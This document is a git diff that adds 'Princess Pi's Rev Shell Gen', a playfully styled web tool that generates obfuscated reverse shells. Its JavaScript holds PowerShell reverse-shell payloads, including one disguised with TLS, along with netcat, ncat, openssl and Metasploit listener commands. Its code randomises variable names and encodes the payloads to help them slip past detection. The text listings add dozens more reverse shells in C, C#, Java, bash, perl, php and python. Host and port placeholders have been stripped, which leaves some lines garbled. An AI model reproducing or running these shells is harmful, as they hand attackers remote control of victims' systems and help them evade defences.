diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..82e82eb --- /dev/null +++ b/.gitignore @@ -0,0 +1,6 @@ +notes.txt +scratch.txt +old +dev +*.bak* +*.old* diff --git a/assets/ComicCodeRegular.woff b/assets/ComicCodeRegular.woff new file mode 100644 index 0000000..6f28158 Binary files /dev/null and b/assets/ComicCodeRegular.woff differ diff --git a/assets/android-chrome-192x192.png b/assets/android-chrome-192x192.png new file mode 100644 index 0000000..bc8c39d Binary files /dev/null and b/assets/android-chrome-192x192.png differ diff --git a/assets/android-chrome-512x512.png b/assets/android-chrome-512x512.png new file mode 100644 index 0000000..25a949a Binary files /dev/null and b/assets/android-chrome-512x512.png differ diff --git a/assets/apple-touch-icon.png b/assets/apple-touch-icon.png new file mode 100644 index 0000000..85c593b Binary files /dev/null and b/assets/apple-touch-icon.png differ diff --git a/assets/favicon-16x16.png b/assets/favicon-16x16.png new file mode 100644 index 0000000..8094621 Binary files /dev/null and b/assets/favicon-16x16.png differ diff --git a/assets/favicon-32x32.png b/assets/favicon-32x32.png new file mode 100644 index 0000000..1d1d128 Binary files /dev/null and b/assets/favicon-32x32.png differ diff --git a/assets/favicon.ico b/assets/favicon.ico new file mode 100644 index 0000000..f99d89c Binary files /dev/null and b/assets/favicon.ico differ diff --git a/assets/princesspi-bkg.png b/assets/princesspi-bkg.png new file mode 100644 index 0000000..63c030e Binary files /dev/null and b/assets/princesspi-bkg.png differ diff --git a/assets/silly.css b/assets/silly.css new file mode 100644 index 0000000..bf13e55 --- /dev/null +++ b/assets/silly.css @@ -0,0 +1,80 @@ +/* +colors: + * light pink background color: #FFDDDD + * dark purple text color: #6B16A0 + * purple (links): #A020F0 + * blue (hovers): #0000FF + * nearly white pale pink for text inputs: #FFEEEE + * lighter purple (buttons): #DCA4FF +*/ + +@font-face { + font-family: ComicCodedRegular; + src: url(ComicCodeRegular.woff) +} + +body { + font-family: ComicCodeRegular, "Comic Sans MS", "Comic Sans", monospace; + font-size: 1.1em; + background-color: #FFDDDD; + background-image: url(princesspi-bkg.png); + background-repeat: no-repeat; + color: #6b16a0; + margin-left: 3em; +} + +a:link { + color: #A020F0; +} + +a:hover { + color: #0000FF; +} + +textarea { + font-family: 'Courier New', Courier, monospace; +} + +label { + text-decoration: underline; +} + +label:focus, label:hover { + text-decoration: none; +} + +input[type=text],select,textarea { + border: 2px solid #A020F0; + background-color: #FFEEEE; +} + +input[type=text]:focus,select:focus,textarea:focus { + border: 2px solid #0000FF; +} + +input[type=button], input[type=submit] { + background-color: #dca4ff; + font-family: ComicCodeRegular, "Comic Sans MS", "Comic Sans", monospace; +} + +input[type=button].marginalized { + /*margin-left: 50px;*/ + margin-top: 10px; +} + +input[type=button]:hover, input[type=submit]:hover, input[type=button]:focus, input[type=submit]:focus { + border: 2px solid #0000FF; +} + +.label { + font-weight: bold; +} + +.hidden { + display: none; +} + +.emphasis { + font-weight: bold; + font-size: 1.2em; +} \ No newline at end of file diff --git a/assets/silly.js b/assets/silly.js new file mode 100644 index 0000000..3946a9f --- /dev/null +++ b/assets/silly.js @@ -0,0 +1,190 @@ +const psOne = '$LHOST = ""; $LPORT = ; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()'; + +const psTwo = 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient("",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'; + +const psThree = 'powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient("", );$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + "SHELL> ");$StreamWriter.Flush()}WriteToStream "";while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"'; + +const psFourTLS = "$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('', );$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"; + +const psRevRaw = [psOne, psTwo, psThree, psFourTLS]; + +const listenerOne = 'nc -lvnp '; // nc cleartext tcp + +const listenerTwo = 'nc -u -lvp '; // nc cleartext udp + +const listenerThree = 'sudo ncat -lvnp '; // ncat cleartext tcp + +const listenerFour = 'sudo ncat --ssl -lvnp '; // ncat TLS // issues with this so far + +const listenerFive = 'sudo openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes; openssl s_server -quiet -key key.pem -cert cert.pem -port ' // openssl TLS + +const listenerSix = 'sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport ; exploit"' // msfconsole (metasploit) TCP // needs testing + +const listenerSeven = 'sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_udp; set lhost 127.0.0.1; set lport ; exploit"' // msfconsole (metasploit) UDP // needs testing + +const listenersRaw = [listenerOne, listenerTwo, listenerThree, listenerFour, listenerFive, listenerSix, listenerSeven]; + + +function revealConfig() { + document.getElementById("advancedConfig").style.display = "block"; +} + +function showListener() { + document.getElementById("listenerDiv").style.display = "block"; +} + + +function encodeUTF16LE(str) { // props Keveun https://stackoverflow.com/questions/24379446/utf-8-to-utf-16le-javascript + var out, i, len, c; + var char2, char3; + + out = ""; + len = str.length; + i = 0; + while(i < len) { + c = str.charCodeAt(i++); + switch(c >> 4) + { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + // 0xxxxxxx + out += str.charAt(i-1); + break; + case 12: case 13: + // 110x xxxx 10xx xxxx + char2 = str.charCodeAt(i++); + out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F)); + out += str.charAt(i-1); + break; + case 14: + // 1110 xxxx 10xx xxxx 10xx xxxx + char2 = str.charCodeAt(i++); + char3 = str.charCodeAt(i++); + out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0)); + break; + } + } + + var byteArray = new Uint8Array(out.length * 2); + for (var i = 0; i < out.length; i++) { + byteArray[i*2] = out.charCodeAt(i); // & 0xff; + byteArray[i*2+1] = out.charCodeAt(i) >> 8; // & 0xff; + } + + return String.fromCharCode.apply( String, byteArray ); +} + + +function genShell() { + const host = document.getElementById("host").value; + const port = document.getElementById("port").value; + const rstype = document.getElementById("rstype").value; + const listenertype = document.getElementById("listenertype").value; + const minLen = document.getElementById("minLen").value; + const maxLen = document.getElementById("maxLen").value; + + const psRevStringRaw = psRevRaw[rstype]; + encodePS(psRevStringRaw); +} + +function randInt(min=2, max=7) { + const minCeil = Math.ceil(min); + const maxFloor = Math.floor(max); + return Math.floor(Math.random() * (maxFloor - minCeil) + minCeil); +} + +function randVarname(minLen=2, maxLen=7, charSet='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789') { + let out = ''; + const randLen = randInt(minLen, maxLen); + const charsLen = charSet.length; + + for (let i=0; i/gi, host); + moddedCmdString = moddedCmdString.replaceAll(//gi, port); + + // moddedCmdString = moddedCmdString.replaceAll(//gi, shell); // for when we evolve past ps lmao + return moddedCmdString; +} + +function encodePS(rawShellString, listenerShow=true) { + const host = document.getElementById("host").value; + const port = document.getElementById("port").value; + const rstype = document.getElementById("listenertype").value; + const minLen = document.getElementById("minLen").value; + const maxLen = document.getElementById("maxLen").value; + + let matchies = rawShellString.match(/\$(?!null|zero|false|true)[a-z0-9-_]{2,30}/gi); + + const varsLen = matchies.length; + + let randVarSubArr = new Array(); + let moddedCmdString = configShell(rawShellString, host, port); + + for(let i=0; i& /dev/tcp/>/ 0>&1"); + p.waitFor(); + p.destroy(); + } catch (Exception e) {} + } +} +``` + +``` +public class shell { + public static void main(String[] args) { + ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp// 0>&1") + .redirectErrorStream(true); + try { + Process p = pb.start(); + p.waitFor(); + p.destroy(); + } catch (Exception e) {} + } +} +``` + +``` +import java.io.InputStream; +import java.io.OutputStream; +import java.net.Socket; + +public class shell { + public static void main(String[] args) { + String host = ""; + int port = ; + String cmd = "bash"; + try { + Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); + Socket s = new Socket(host, port); + InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); + OutputStream po = p.getOutputStream(), so = s.getOutputStream(); + while (!s.isClosed()) { + while (pi.available() > 0) + so.write(pi.read()); + while (pe.available() > 0) + so.write(pe.read()); + while (si.available() > 0) + po.write(si.read()); + so.flush(); + po.flush(); + Thread.sleep(50); + try { + p.exitValue(); + break; + } catch (Exception e) {} + } + p.destroy(); + s.close(); + } catch (Exception e) {} + } +} +``` \ No newline at end of file diff --git a/revshells-compiled-listing.txt b/revshells-compiled-listing.txt new file mode 100644 index 0000000..f8bc35f --- /dev/null +++ b/revshells-compiled-listing.txt @@ -0,0 +1,174 @@ +pure C: +``` +#include +#include +#include +#include +#include +#include +#include + +int main(void){ + int port = ; + struct sockaddr_in revsockaddr; + + int sockt = socket(AF_INET, SOCK_STREAM, 0); + revsockaddr.sin_family = AF_INET; + revsockaddr.sin_port = htons(port); + revsockaddr.sin_addr.s_addr = inet_addr(""); + + connect(sockt, (struct sockaddr *) &revsockaddr, + sizeof(revsockaddr)); + dup2(sockt, 0); + dup2(sockt, 1); + dup2(sockt, 2); + + char * const argv[] = {"bash", NULL}; + execvp("", argv); + + return 0; +} +``` + +C windows: +``` +#include +#include +#pragma comment(lib,"ws2_32") + +WSADATA wsaData; +SOCKET Winsock; +struct sockaddr_in hax; +char ip_addr[16] = ""; +char port[6] = ""; + +STARTUPINFO ini_processo; + +PROCESS_INFORMATION processo_info; + +int main() +{ + WSAStartup(MAKEWORD(2, 2), &wsaData); + Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0; + + + struct hostent *host; + host = gethostbyname(ip_addr); + strcpy_s(ip_addr, 16, inet_ntoa(*((struct in_addr *)host->h_addr))); + + hax.sin_family = AF_INET; + hax.sin_port = htons(atoi(port)); + hax.sin_addr.s_addr = inet_addr(ip_addr); + + WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL); + + memset(&ini_processo, 0, sizeof(ini_processo)); + ini_processo.cb = sizeof(ini_processo); + ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; + ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; + + TCHAR cmd[255] = TEXT(".exe"); // ? + // TCHAR cmd[255] = TEXT("cmd.exe"); + + CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info); + + return 0; +} +``` + +C#: +``` +using System; +using System.Text; +using System.IO; +using System.Diagnostics; +using System.ComponentModel; +using System.Linq; +using System.Net; +using System.Net.Sockets; + + +namespace ConnectBack +{ + public class Program + { + static StreamWriter streamWriter; + + public static void Main(string[] args) + { + using(TcpClient client = new TcpClient("", )) + { + using(Stream stream = client.GetStream()) + { + using(StreamReader rdr = new StreamReader(stream)) + { + streamWriter = new StreamWriter(stream); + + StringBuilder strInput = new StringBuilder(); + + Process p = new Process(); + p.StartInfo.FileName = ""; + p.StartInfo.CreateNoWindow = true; + p.StartInfo.UseShellExecute = false; + p.StartInfo.RedirectStandardOutput = true; + p.StartInfo.RedirectStandardInput = true; + p.StartInfo.RedirectStandardError = true; + p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); + p.Start(); + p.BeginOutputReadLine(); + + while(true) + { + strInput.Append(rdr.ReadLine()); + //strInput.Append("\n"); + p.StandardInput.WriteLine(strInput); + strInput.Remove(0, strInput.Length); + } + } + } + } + } + + private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) + { + StringBuilder strOutput = new StringBuilder(); + + if (!String.IsNullOrEmpty(outLine.Data)) + { + try + { + strOutput.Append(outLine.Data); + streamWriter.WriteLine(strOutput); + streamWriter.Flush(); + } + catch (Exception err) { } + } + } + + } +} +``` + +C#: +``` +using System; +using System.Diagnostics; + +namespace BackConnect { + class ReverseBash { + public static void Main(string[] args) { + Process proc = new System.Diagnostics.Process(); + proc.StartInfo.FileName = ""; + proc.StartInfo.Arguments = "-c \" -i >& /dev/tcp/>/ 0>&1\""; + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + while (!proc.StandardOutput.EndOfStream) { + Console.WriteLine(proc.StandardOutput.ReadLine()); + } + } + } +} + +``` \ No newline at end of file diff --git a/revshells-links.txt b/revshells-links.txt new file mode 100644 index 0000000..da418eb --- /dev/null +++ b/revshells-links.txt @@ -0,0 +1,5 @@ +https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/ + +https://www.revshells.com + +https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet \ No newline at end of file diff --git a/revshells-listing.txt b/revshells-listing.txt new file mode 100644 index 0000000..3b13fed --- /dev/null +++ b/revshells-listing.txt @@ -0,0 +1,118 @@ +revshells: + powershell: + Cleartext: + $LHOST = ""; $LPORT = ; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close() + + powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" + + powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('', );$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" + + C='curl -Ns telnet://:'; $C &1 | 2>&1 | $C >/dev/null + + // udp + rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| -i 2>&1|ncat -u >/tmp/f + + ncat.exe -e + + ncat -e + + nc -c + + nc -e + + nc.exe -e + + perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec(" -i");};' + + perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' + + php -r '$sock=fsockopen("",);exec(" <&3 >&3 2>&3");' + + php -r '$sock=fsockopen("",);shell_exec(" <&3 >&3 2>&3");' + + php -r '$sock=fsockopen("",);system(" <&3 >&3 2>&3");' + + php -r '$sock=fsockopen("",);passthru(" <&3 >&3 2>&3");' + + php -r '$sock=fsockopen("",);` <&3 >&3 2>&3`;' + + php -r '$sock=fsockopen("",);popen(" <&3 >&3 2>&3", "r");' + + php -r '$sock=fsockopen("",);$proc=proc_open("", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' + + + + TLS: // giving cert error on ncat TLS listener + $sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('', );$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close() + + openssl: + mkfifo /tmp/s; -i < /tmp/s 2>&1 | openssl s_client -quiet -connect : > /tmp/s; rm /tmp/s + *nix: + awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null + + zsh -c 'zmodload zsh/net/tcp && ztcp && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' + + TF=$(mktemp -u);mkfifo $TF && telnet 0<$TF | bash 1>$TF + + // udp + -i >& /dev/udp// 0>&1 + + -i 5<> /dev/tcp// 0<&5 1>&5 2>&5 + + exec 5<>/dev/tcp//;cat <&5 | while read line; do $line 2>&5 >&5; done + + 0<&196;exec 196<>/dev/tcp//; <&196 >&196 2>&196 + + -i >& /dev/tcp// 0>&1 + + rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| -i 2>&1|nc >/tmp/f + + python: + : "bash", "powershell", "zsh", "cmd", etc + + export RHOST="";export RPORT=;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("")' + + python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("")' + + python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("")' + + python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("",));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("")' + + windows: + ``` + import os,socket,subprocess,threading; + def s2p(s, p): + while True: + data = s.recv(1024) + if len(data) > 0: + p.stdin.write(data) + p.stdin.flush() + + def p2s(s, p): + while True: + s.send(p.stdout.read(1)) + + s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect(("",)) + + p=subprocess.Popen([""], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) + + s2p_thread = threading.Thread(target=s2p, args=[s, p]) + s2p_thread.daemon = True + s2p_thread.start() + + p2s_thread = threading.Thread(target=p2s, args=[s, p]) + p2s_thread.daemon = True + p2s_thread.start() + + try: + p.wait() + except KeyboardInterrupt: + s.close() + ``` + + + +Listeners: + ncat TLS: + sudo ncat --ssl -lvnp \ No newline at end of file diff --git a/silly.html b/silly.html new file mode 100644 index 0000000..4f4f5a1 --- /dev/null +++ b/silly.html @@ -0,0 +1,102 @@ + + + + + + Princess Pi's Rev Shell Gen! ~ Sillytime! :tbh_bounces: + + + + + + + + +

Princess Pi's Silly PowerShell Silly!

+ Whatchu wanna do~ uwu
+ +
+ + +
+ +


+ + + + + + + + + + + + + \ No newline at end of file